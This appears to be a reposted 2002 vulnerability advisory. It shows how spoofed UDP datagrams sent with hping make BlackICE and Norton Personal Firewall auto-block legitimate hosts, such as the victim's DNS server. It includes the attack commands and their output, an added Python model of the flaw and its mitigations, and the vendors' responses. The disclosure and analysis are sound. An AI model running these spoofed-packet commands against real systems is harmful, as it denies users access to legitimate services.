 Multiple Vendor PC Firewall Remote Denial of Services Vulnerability
Category: Vulnerability
Posted: 2002-10-13 by Gmtech
Views: 519
Source: Click here
 
Details

Affected versions:

Yiming has tested the following products:

* BlackICE Defender for server version 2.9.cap
* BlackICE Server Protection version 3.5.cdf
* Norton Personal Firewall 2002 (version 4.0)

Below are the steps and results of the test against BlackICE.

Step 1:

A clean, default installation of BlackICE Defender for server (version 2.9.cap) on a Windows 2000 Server machine whose IP address is ip.add.of.victim.

Step 2:

On a Linux box with hping installed, run the following three commands:

---

[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

---



These three commands do the same thing: each sends five UDP datagrams (-2, -c 5) to port 31335 of ip.add.of.victim carrying the 4-byte payload "PONG" (-e PONG -d 4), which matches the signature of the Trinoo DDoS tool's daemon-to-master traffic, with the IP source address forged (-a) to a third party: our own DNS server, www.google.com and www.networkice.com. The 100% packet loss hping reports is expected, since any reply is sent to the spoofed source rather than to the attacker. Nothing in a UDP datagram authenticates its source address, so the attacker can put any address of its choosing in that field.

Result:

Each time a command is executed, the BlackICE icon in the Windows system tray flashes and an entry is added automatically to BlackICE's Advanced Firewall Settings that blocks all subsequent packets arriving from the spoofed address. Because the blocked address is the one the attacker wrote into the packet rather than the attacker's own, the spoofed host (here the victim's own DNS server) becomes unreachable to the user, a denial-of-service condition created by the protection itself.

The test steps and result for Norton Personal Firewall are almost the same, using the following command instead of the one used in the previous example:

hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address
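The following is an added example, not code from the advisory or from ISS or Symantec. It models the auto-block logic the BlackICE and Norton tests above exercise: a signature hit on an inbound UDP datagram adds the datagram's source address to a timed block list, so an attacker who forges that address gets a legitimate host (the victim's DNS server, as in the first hping command) blocked. The victim and DNS server names are the advisory's placeholders; the signature names, the Packet layout, the 30-minute timeout and exclusion list (taken from Symantec's response) and the block_on_spoofable option are assumptions of this model, not vendor behaviour.

```python
"""Model of a personal firewall's auto-block engine (added example, not vendor code).

Reproduces the flaw described in the advisory: the address that gets blocked is the
source address of an unauthenticated UDP datagram, which the attacker chooses freely.
Names, timeouts and options below are assumptions of this model.
"""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List, Optional, Tuple

VICTIM = "ip.add.of.victim"          # placeholder from the advisory
DNS_SERVER = "ip.add.of.dnsserver"   # the victim's real DNS server, spoofed by the attacker

# Signature table keyed on (protocol, destination port, payload prefix). The two entries
# mirror the hping payloads used in the advisory; the signature names are assumptions.
SIGNATURES: Dict[Tuple[str, int, bytes], str] = {
    ("udp", 31335, b"PONG"): "trinoo-daemon-reply",   # BlackICE test pattern
    ("udp", 2140, b"13"): "udp-2140-probe",           # Norton test pattern
}
SPOOFABLE = frozenset({"udp", "icmp"})  # no handshake: source address is unauthenticated


@dataclass
class Packet:
    proto: str
    src: str          # source address as written in the IP header (attacker-controlled)
    dst: str
    dst_port: int
    payload: bytes = b""


@dataclass
class AutoBlockFirewall:
    block_seconds: int = 30 * 60               # Symantec: default AutoBlock timeout is 30 minutes
    exclusions: FrozenSet[str] = frozenset()   # AutoBlock exclusion list: never auto-blocked
    block_on_spoofable: bool = True            # vulnerable default: auto-block even on UDP/ICMP hits
    blocked_until: Dict[str, int] = field(default_factory=dict)
    log: List[str] = field(default_factory=list)

    def match(self, pkt: Packet) -> Optional[str]:
        """Return the signature name the packet matches, or None."""
        for (proto, port, prefix), name in SIGNATURES.items():
            if pkt.proto == proto and pkt.dst_port == port and pkt.payload.startswith(prefix):
                return name
        return None

    def is_blocked(self, src: str, now: int) -> bool:
        """True while an auto-block entry for src is still within its timeout."""
        until = self.blocked_until.get(src)
        if until is None:
            return False
        if now >= until:                 # entry expired: unblock
            del self.blocked_until[src]
            return False
        return True

    def inbound(self, pkt: Packet, now: int) -> bool:
        """Process one inbound packet; return True if it is delivered to the host."""
        if self.is_blocked(pkt.src, now):
            self.log.append(f"t={now} drop {pkt.src}: auto-blocked")
            return False
        sig = self.match(pkt)
        if sig is None:
            return True
        self.log.append(f"t={now} signature {sig} from {pkt.src}")
        if pkt.src in self.exclusions:
            self.log.append(f"t={now} {pkt.src} is excluded, not auto-blocked")
        elif pkt.proto in SPOOFABLE and not self.block_on_spoofable:
            self.log.append(f"t={now} {pkt.src} not auto-blocked: {pkt.proto} source is unauthenticated")
        else:
            # The flaw: the block is keyed on an address the attacker wrote into the packet.
            self.blocked_until[pkt.src] = now + self.block_seconds
            self.log.append(f"t={now} auto-block {pkt.src} for {self.block_seconds}s")
        return False                     # the flagged packet itself is always dropped


def run_scenario(fw: AutoBlockFirewall) -> Tuple[bool, bool]:
    """Replay the advisory: five spoofed 'PONG' datagrams to UDP/31335 carrying the DNS
    server's address (what 'hping -2 -p 31335 -e PONG -d 4 -c 5 -a ip.add.of.dnsserver'
    sends), then a genuine DNS reply right after, and the same reply 30 minutes later.
    Returns (reply delivered immediately, reply delivered after the timeout)."""
    t = 0
    for _ in range(5):
        fw.inbound(Packet("udp", DNS_SERVER, VICTIM, 31335, b"PONG"), t)
        t += 1
    # Constructed DNS answer from the real server to the victim's ephemeral port 33000.
    reply = Packet("udp", DNS_SERVER, VICTIM, 33000, b"\x12\x34\x81\x80")
    now = fw.inbound(reply, t)
    later = fw.inbound(reply, t + 30 * 60)
    return now, later


if __name__ == "__main__":
    print("default config       :", run_scenario(AutoBlockFirewall()))
    print("DNS server excluded  :", run_scenario(AutoBlockFirewall(exclusions=frozenset({DNS_SERVER}))))
    print("no block on UDP hits :", run_scenario(AutoBlockFirewall(block_on_spoofable=False)))
```

With the default configuration the genuine DNS reply is dropped until the entry expires, which is the condition the advisory reports; placing the DNS server on the exclusion list (the workaround in Symantec's response) or refusing to auto-block on protocols whose source cannot be verified both keep the reply flowing while the forged datagrams are still dropped.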



Vendor response:

Yiming contacted symsecurity@symantec.com and NSupport@iss.net on Sep 24, 2002. Symantec told him they had forwarded his concerns to the appropriate team; ISS (BlackICE) replied that the behaviour is part of the product's functionality.



Symantec response:

Symantec was notified of a potential denial-of-service (DoS) issue with Symantec Norton Personal Firewall's AutoBlock feature. The discoverer, Yiming Gong, China Netcom, subsequently posted the findings to the BugTraq mailing list, prior to a coordinated response from Symantec. According to the discoverer, by directing an attack against a user of a personal firewall providing a form of auto blocking capability and by spoofing a valid IP address, an attacker could potentially create a DoS of that address when the AutoBlock feature blocks access to the IP address for a period of time. In this manner, a valid IP address could possibly be temporarily denied to the user of the personal firewall.

Symantec considers the AutoBlock feature of their personal firewall products to be a valuable part of any Internet security capability. While the scenario described in the referenced Bugtraq posting could cause a minor temporary DoS, a concerted attack of this type would, by its very nature, be of limited scope. The default timeout for AutoBlock is 30 minutes, so even if an IP address were to be blocked in this manner, it would be for a limited period.

Symantec's AutoBlock feature does provide an exclusion list so that, should a user become aware of a spoofed DoS attack of this nature, they could place the valid IP address in the AutoBlock exclusion list to prevent the valid site from being blocked automatically. The attack packets from the spoofed IP address used in the DoS attempt would still be intercepted by the firewall, but the intended DoS by the attacker would be thwarted.

However, while Symantec considers a threat of this nature to be very low risk and highly limited in scope, we are continuously working to increase the security capability and posture of our products. Symantec is researching ways of building additional intelligent decision capability into our AutoBlock feature.


 